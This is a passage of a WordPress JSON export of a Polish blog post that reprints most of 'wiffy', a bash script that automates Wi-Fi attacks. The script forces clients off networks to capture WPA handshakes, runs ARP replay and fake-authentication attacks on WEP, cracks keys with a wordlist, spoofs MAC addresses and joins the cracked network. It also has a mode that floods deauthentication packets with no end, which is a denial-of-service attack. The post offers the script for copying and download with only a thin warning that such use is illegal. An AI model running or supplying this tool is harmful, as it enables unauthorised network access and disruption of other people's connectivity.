then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" >> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{